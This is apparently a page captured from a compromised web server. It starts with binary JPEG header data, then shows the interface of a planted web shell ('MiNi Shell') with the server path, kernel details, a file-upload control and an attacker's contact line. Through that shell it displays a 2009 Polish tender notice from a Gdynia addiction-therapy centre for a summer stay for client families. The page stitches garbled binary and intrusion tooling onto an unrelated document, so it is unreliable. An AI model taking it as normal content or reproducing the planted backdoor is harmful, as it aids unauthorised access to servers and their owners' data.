JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/64273-N-2009.html

<p class="kh_header"><b>Gdynia: zorganizowanie letniego 
               pobytu wraz z wyżywieniem 
               dla  rodzin objętych pomocą           
               Ośrodka Profilaktyki i Terapii Uzależnień w Gdyni
               w sezonie letnim 2009</b><br>
<b>Numer ogłoszenia: 64273 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Profilaktyki i Terapii Uzależnień , ul. Reja 2A, 81-441 Gdynia, woj. pomorskie, tel. 0-58 621 61 35, faks 0-58 621 61 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opitu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie letniego 
               pobytu wraz z wyżywieniem 
               dla  rodzin objętych pomocą           
               Ośrodka Profilaktyki i Terapii Uzależnień w Gdyni
               w sezonie letnim 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest zorganizowanie letniego pobytu wraz z wyżywieniem dla rodzin objętych pomocą Ośrodka Profilaktyki  i Terapii Uzależnień w Gdyni w sezonie letnim 2009 w miejscowość usytuowanej w odległości nie przekraczającej 150 km  od miasta Gdyni.

2. Szacowana przez Zamawiającego, łączna  ilość  uczestników letniego pobytu : 88 osób                   ( 50% dorośli , 50% dzieci). 
Szacunkowa liczba uczestników  letniego pobytu  w poszczególnych turnusach : 
I turnus - 44 osoby ( 50% dzieci , 50% dorośli )  , w tym :  42 osoby z rodzin objętych pomocą OPiTU oraz  1 wolontariusz skierowany przez OPiTU  i 1 pielęgniarka skierowana przez OPiTU; 
II  turnus - 44 osoby ( 50% dzieci , 50% dorośli ) , w tym :  42 osoby z rodzin objętych pomocą OPiTU oraz  1 wolontariusz skierowany przez OPiTU  i 1 pielęgniarka skierowana przez OPiTU .

  Rzeczywista liczba uczestników  letniego pobytu  u zostanie ustalona przez Zamawiającego              nie później niż w terminie 10 (słownie: dziesięciu)  dni przed datą rozpoczęcia każdego z turnusów i przekazana (w formie pisemnej) Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w  niniejszym postępowaniu   o udzielenie zamówienia publicznego . 

UWAGA : 
1/ Zamawiający  zastrzega sobie możliwość zwiększenia lub zmniejszenia liczby uczestników letniego pobytu  - nie więcej niż 10% (dziesięć procent) - w stosunku do łącznej ilości uczestników wskazanej wyżej. 
2/ Zamawiający  zastrzega sobie prawo - w przypadku braku chętnych do skorzystania z letniego pobytu  -  do jego niezorganizowania. 


3. Wymagania Zamawiającego dotyczące bazy noclegowej .
Wykonawca jest zobowiązany do zapewnienia uczestnikom pobytu następującej bazy noclegowej : 
a)pensjonat lub murowany ośrodek kolonijny  przeznaczony wyłącznie dla uczestników  , 
b)pokoje estetyczne, wyłącznie 2 , 3 lub 4 osobowe , 
c)każdy z pokoi  wyposażony w pełny węzeł sanitarny , 
d)każdy z pokoi  wyposażony dodatkowo w: czajnik bezprzewodowy , naczynia niezbędne             do przygotowania gorących napoi ( kawa , herbata , itp.),  radio, lampki nocne , 
e)na terenie obiektu ( pensjonatu lub murowanego ośrodka kolonijnego) musi znajdować się boisko sportowe oraz miejsce przeznaczone na zorganizowanie ogniska , 
f)obiekt ( pensjonat lub murowany ośrodek kolonijny) wyposażony w: dwa pomieszczenia                               ( podczas każdego z turnusów ) przeznaczone do prowadzenia zajęć terapeutycznych                dla 25 osób  w każdym pomieszczeniu oraz salę dyskotekową
g)obiekt ( pensjonat lub murowany ośrodek kolonijny) spełnia wszystkie , przewidziane przepisami prawa , wymagania przeciwpożarowe.

UWAGA : 
a/ w czasie trwania każdego z turnusów na terenie całego ( budynku i terenu) : pensjonatu lub ośrodka kolonijnego musi obowiązywać bezwzględny zakaz  sprzedaży  i dystrybucji napojów alkoholowych , 
b/ Wykonawca  będzie zobowiązany do  całodobowego udostępnienia odrębnego pomieszczenia przeznaczonego dla pielęgniarki (w obiekcie przeznaczonym dla uczestników letniego pobytu).

4. Wymagania Zamawiającego dotyczące wyposażenia bazy noclegowej w sprzęt sportowy                         i rekreacyjny.
Wykonawca jest zobowiązany do zapewnienia uczestnikom pobytu następującego sprzętu sportowego i rekreacyjnego : 
a)stół do ping-ponga ( łącznie z siatką , rakietkami - minimum 4 oraz piłeczkami - minimum        10 sztuk) , 
b)badminton - minimum 4 komplety łącznie z lotkami  - minimum 10 sztuk ,
c)piłki do gry:  w siatkówkę  oraz  nożną ( minimum - po 2 sztuki ) , 
d)gry zręcznościowe ( np. piłkarzyki- minimum 1 sztuka) . 

Wskazane byłoby także zapewnienie przez Wykonawcę bilardu stołowego  ( łącznie z kijami - minimum 4 oraz kompletem bil),  

5. Zamawiający  dokona oceny spełniania  warunków wskazanych w pkt.3 i 4 na podstawie : 

- w odniesieniu do bazy noclegowej :

a)danych  Wykonawcy zawartych w załączniku do Specyfikacji Istotnych Warunków Zamówienia - DANE DOTYCZĄCE BAZY NOCLEGOWEJ  PRZEZNACZONEJ DLA UCZESTNIKÓW LETNIEGO POBYTU ,
b)zdjęć (czytelnych) :  bazy noclegowej (obiektu) ,  pokoi (wybranych) przeznaczonych przez Wykonawcę   dla uczestników letniego pobytu  oraz sali dyskotekowej,pomieszczeń                               przeznaczonych do prowadzenia zajęć terapeutycznych,
c)oględzin (przeprowadzonych przez upoważnionego przedstawiciela-przedstawicieli Zamawiającego po terminie składania ofert ) obiektów  i pokoi przeznaczonych przez Wykonawcę do realizacji przedmiotu zamówienia w celu zweryfikowania spełnienia warunków określonych w Specyfikacji Istotnych Warunków Zamówienia przez Zamawiającego oraz potwierdzonych przez Wykonawcę w złożonej ofercie .   
O terminie oględzin Zamawiający poinformuje w formie pisemnej, z minimum 2 dniowym wyprzedzeniem. Wykonawca jest zobowiązany do udostępnienia obiektów                                                 i pokoi   w terminie wyznaczonym przez Zamawiającego . W oględzinach musi uczestniczyć upoważniony przedstawiciel Wykonawcy. Z oględzin zostanie sporządzony protokół podpisany przez : przedstawiciela-i Zamawiającego i przedstawiciela/i  Wykonawcy obecnych podczas dokonywania oględzin . W przypadku odmowy podpisania protokołu przez  przedstawiciela-i  Wykonawcy - protokół zostanie podpisany jednostronnie przez przedstawiciela-i  Zamawiającego .

- w odniesieniu do wyposażenia bazy noclegowej w sprzęt sportowy i rekreacyjny  :

a) danych  Wykonawcy zawartych w załączniku  do Specyfikacji Istotnych Warunków Zamówienia - DANE DOTYCZĄCE  SPRZĘTU SPORTOWEGO I REKREACYJNEGO PRZEZNACZONEGO DLA UCZESTNIKÓW LETNIEGO POBYTU.

6.  Wymagania Zamawiającego dotyczące wyżywienia uczestników letniego pobytu  . 
Wykonawca  będzie zobowiązany do zapewnienia czterech posiłków dziennie (dla dzieci)  oraz trzech posiłków dziennie (dla dorosłych) przygotowywanych zgodnie z obowiązującymi przepisami sanitarno-epidemiologicznymi. 
Łączna, dobowa, kaloryczność posiłków  nie może być mniejsza od 2 400 kcal na osobę, z czego co najmniej 40% ( 960 kcal) musi przypadać na dwudaniowy obiad. 

7. Zamawiający  dokona oceny spełniania  warunków wskazanych w pkt.6 na podstawie   szczegółowego jadłospisu - sporządzonego  przez Wykonawcę na załączniku do Specyfikacji Istotnych Warunków Zamówienia (JADŁOSPIS  DLA UCZESTNIKÓW LETNIEGO POBYTU )  - na podstawie wskazanych przez Wykonawcę (w w/w załączniku) artykułów spożywczych  , których użycie przewiduje do wykonania  posiłków  oraz ich gramatury. 

8. Wykonawca będzie zobowiązany do zapewnienia uczestnikom letniego pobytu : 
1.	natychmiastowego transportu do odpowiedniego zakładu opieki zdrowotnej zapewniającego pomoc medyczną zgodnie z obowiązującymi przepisami 
2.	podstawowych leków oraz  podstawowych środków higienicznych 
3.	odrębnego pomieszczenia ( całodobowo)  dla pielęgniarki skierowanej przez OPiTU.

9. Wykonawca będzie  zobowiązany do przygotowania zaplecza technicznego do zorganizowania  ogniska  i zakupienia kiełbasek na jedno ognisko dla uczestników letniego pobytu ( dotyczy każdego          z turnusów ) . 

10. Wykonawca będzie zobowiązany do pokrycia kosztów ubezpieczenia uczestników letniego pobytu              w czasie jego  trwania   (NNW- minimum  10 000 zł - w odniesieniu do każdego uczestnika ) - przez cały okres trwania każdego z turnusów  (od przyjazdu uczestników pobytu do miejsca zakwaterowania wskazanego do wyjazdu uczestników  pobytu z tego miejsca ) , 
Przyjazd uczestników pobytu nastąpi nie później niż do godz.10.00 ( rano ) pierwszego dnia , powrót (wyjazd z miejsca pobytu) nie wcześniej niż o godz.15.00 ostatniego dnia . 

UWAGA :  
W terminie poprzedzającym podpisanie umowy - Wykonawca , którego oferta zostanie uznana   za najkorzystniejszą  będzie zobowiązany do przedłożenia Zamawiającemu poświadczonej za zgodność z oryginałem kserokopii polisy ubezpieczeniowej  NNW uczestników pobytu na okres trwania każdego z turnusów ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 29.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 1 500 zł  (słownie: tysiąc pięćset złotych) oraz  zabezpieczenia należytego wykonania umowy w wysokości 3% (słownie: trzy procent) ceny brutto pomnożonej przez 88<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy: 
a/ posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b/ posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów 
do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
 Minimalny poziom wymaganych przez Zamawiającego standardów został określony : 
a) w odniesieniu do bazy noclegowej - w Rozdziale II. OPIS PRZEDMIOTU ZAMÓWIENIA. INFORMACJE DODATKOWE.TERMIN WYKONANIA ZAMÓWIENIA - pkt.3 SIWZ, 
b)	w odniesieniu do wyposażenia bazy noclegowej w sprzęt sportowy i rekreacyjny  -                   w Rozdziale II. OPIS PRZEDMIOTU ZAMÓWIENIA. INFORMACJE DODATKOWE.TERMIN WYKONANIA ZAMÓWIENIA - pkt.4 SIWZ.

c/ znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonania zamówienia;W celu potwierdzenia , że Wykonawca  znajduje się w sytuacji  ekonomicznej i finansowej zapewniającej wykonania zamówienia - Wykonawca jest zobowiązany  do złożenia: informacji banku  lub spółdzielczej kasy oszczędnościowo- kredytowej , w których Wykonawca posiada rachunek , potwierdzającej wysokość posiadanych środków finansowych  lub zdolność kredytową Wykonawcy na kwotę nie mniejszą od 25 000 zł (słownie: dwadzieścia  pięć tysięcy złotych) wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert .
Informacje o których mowa wyżej, określone w walucie innej niż PLN, będą przeliczane na podstawie średniego kursu NBP obowiązującego w dniu otwarcia ofert .

d/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
2. Ocena spełniania warunków  nastąpi na podstawie przedstawionych przez Wykonawcę danych ( informacji ) zawartych w dokumentach i oświadczeniach wymaganych przez Zamawiającego , w/g formuły spełnia / nie spełnia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy sa zobowiązani do złożenia następujących dokumentów i oświadczeń : 
a) aktualny odpis z właściwego rejestru albo aktualne  zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert; b) aktualna informacja z Krajowego Rejestru Karnego         w zakresie określonym w art. 24 ust.1 pkt.4, 5, 6, 7, 8 ustawy Prawo zamówień publicznych -  wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; c) aktualna informacja z Krajowego Rejestru Karnego            w zakresie określonym w art. 24 ust.1 pkt.9 ustawy Prawo zamówień publicznych -  wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; d) 4. aktualne zaświadczenie właściwego naczelnika  urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; e) oświadczenia Wykonawcy potwierdzającego , że Wykonawca posiada uprawnienia do wykonywania działalności lub czynności stanowiącej przedmiot niniejszego postępowania o udzielenie zamówienia publicznego oraz nie podlega wykluczeniu z postępowania na podstawie art. 24  ust.1 i 2 ustawy Prawo zamówień publicznych; f) oświadczenia Wykonawcy potwierdzającego , że Wykonawca posiada niezbędną wiedzę   i doświadczenie oraz dysponuje lub będzie dysponował potencjałem technicznym i osobami zdolnymi do wykonania  zamówienia; 
g) wypełnionego załącznika  DANE DOTYCZĄCE BAZY NOCLEGOWEJ  PRZEZNACZONEJ DLA UCZESTNIKÓW LETNIEGO POBYTU; h) wypełnionego załącznika DANE DOTYCZĄCE  SPRZĘTU SPORTOWEGO I REKREACYJNEGO PRZEZNACZONEGO DLA UCZESTNIKÓW LETNIEGO POBYTU; i) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania przedmiotu niniejszego zamówienia  narzędzi  i urządzeń , jeżeli   w załączniku DANE DOTYCZĄCE BAZY NOCLEGOWEJ  PRZEZNACZONEJ DLA UCZESTNIKÓW LETNIEGO POBYTU  lub/i w załączniku DANE DOTYCZĄCE  SPRZĘTU SPORTOWEGO  I REKREACYJNEGO PRZEZNACZONEGO DLA UCZESTNIKÓW LETNIEGO POBYTU  - wskazał narzędzie  i urządzenia , którymi będzie dysponował ,j) oświadczenia Wykonawcy potwierdzającego ,że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ; k) informacja banku  lub spółdzielczej kasy oszczędnościowo- kredytowej , w których Wykonawca posiada rachunek , potwierdzającej wysokość posiadanych środków finansowych  lub zdolność kredytową Wykonawcy  na kwotę nie mniejszą od 25 000 zł (słownie: dwadzieścia pięć tysięcy złotych) wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ( informacje o których mowa wyżej , określone                       w  walucie innej niż PLN , będą przeliczane  na podstawie średniego kursu NBP obowiązującego w dniu otwarcia ofert);
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej :  - zamiast dokumentów wskazanych w pkt.1 ppkt.a,c,d - składa dokument lub dokumenty wystawione             w kraju , w którym ma siedzibę lub miejsce zamieszkania , potwierdzające odpowiednio , że : 
1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości ( wystawiony nie wcześniej niż               6 miesięcy przed upływem terminu składania ofert) ; 
2.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie ( wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert);
3.	nie zalega z uiszczeniem podatków, opłat , składek na ubezpieczenie zdrowotne i społeczne albo,że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (  wystawiony nie wcześniej niż  3 miesiące przed upływem terminu składania ofert)

- zamiast dokumentu wskazanego w pkt.1 ppkt.b- składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą                w zakresie określonym w art. 24 ust.1 pkt.4-8 ustawy Prawo zamówień publicznych ( wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert) 

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów wskazanych w pkt. 1 ppkt.a,b,c,d  - Wykonawca winien je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym  albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania . 
3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo : 
a/ dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu               o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy             w sprawie zamówienia .    
Pełnomocnictwo musi być złożone  w formie oryginału lub poświadczonej notarialnie kopii.
b/ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia jest zobowiązany                 do złożenia dokumentów wymienionych w pkt.1 ppkt.a,b,c,d

Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania .

UWAGA : jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda -przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów . 

Umowa regulująca współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia ,                 w szczególności ,powinna zawierać :strony umowy z oznaczeniem lidera,cel zawarcia umowy,okres obowiązywania umowy (obejmujący okres realizacji przedmiotu zamówienia),solidarną odpowiedzialność każdego z Wykonawców wspólnie ubiegających się  o udzielenie zamówienia wobec Zamawiającego za wykonanie przedmiotu umowy ,wyłączenie możliwości wypowiedzenia umowy przez któregokolwiek z Wykonawców wspólnie  ubiegających się o udzielenie zamówienia do czasu wykonania przedmiotu zamówienia,nakaz powiadamiania Zamawiającego o dokonywanych zmianach w umowie w formie pisemnej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.opitu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Profilaktyki i Terapii Uzależnień 
      ul.Reja 2A
      81-441 Gdynia 
I piętro , pok. nr  10       
dokument nieodpłatny.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 14:30, miejsce: Ośrodek Profilaktyki i Terapii Uzależnień 
      ul.Reja 2A
      81-441 Gdynia 
I piętro , pok. nr  10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com